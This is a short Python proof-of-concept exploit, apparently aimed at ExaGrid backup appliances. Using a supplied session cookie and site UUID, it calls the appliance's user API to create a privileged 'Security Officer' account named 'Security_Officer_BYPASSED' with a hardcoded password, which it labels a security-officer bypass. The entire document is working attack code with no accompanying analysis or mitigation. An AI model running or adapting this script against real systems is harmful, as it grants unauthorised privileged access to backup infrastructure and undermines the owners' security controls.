import requests import argparse # For this PoC, the person running is responsible for obtaining the JSESSIONIDSSO cookie and the UUID of the ExaGrid. This can all be done programmatically as well. def create_security_officer(url, cookie, uuid, debug=False): session = requests.session() api_url = f"https://{url}:443/api/v1/sites/{uuid}/users" cookies = {"JSESSIONIDSSO": cookie} headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/json", "Origin": f"https://{url}", "Referer": f"https://{url}/client/hub/{uuid}/security/a_local_users", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Priority": "u=0", "Te": "trailers", "Connection": "keep-alive" } payload = { "description": "Security Officer Bypass", "enabled": True, "group": "exagrid-sec-offs", # Group Name "name": "Security_Officer_BYPASSED", "password": "XTNhXmJeKHo/P0hdTSY=", # Base64 Encoded Password! "passwordChange": False, "siteUuid": uuid } response = session.post(api_url, headers=headers, cookies=cookies, json=payload, verify=False) if response.status_code in [200, 201]: print("[+] Security Officer Created!") else: print("[-] Error, used debug mode to learn more.") if debug: print(f"Raw Response: {response.text}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="Create a Security Officer user.") parser.add_argument("--url", required=True, help="The base URL (strip https if supplied)") parser.add_argument("--cookie", required=True, help="The session cookie value") parser.add_argument("--uuid", required=True, help="The site UUID") parser.add_argument("--debug", action="store_true", help="Enable debug mode to print raw responses") args = parser.parse_args() create_security_officer(args.url, args.cookie, args.uuid, args.debug)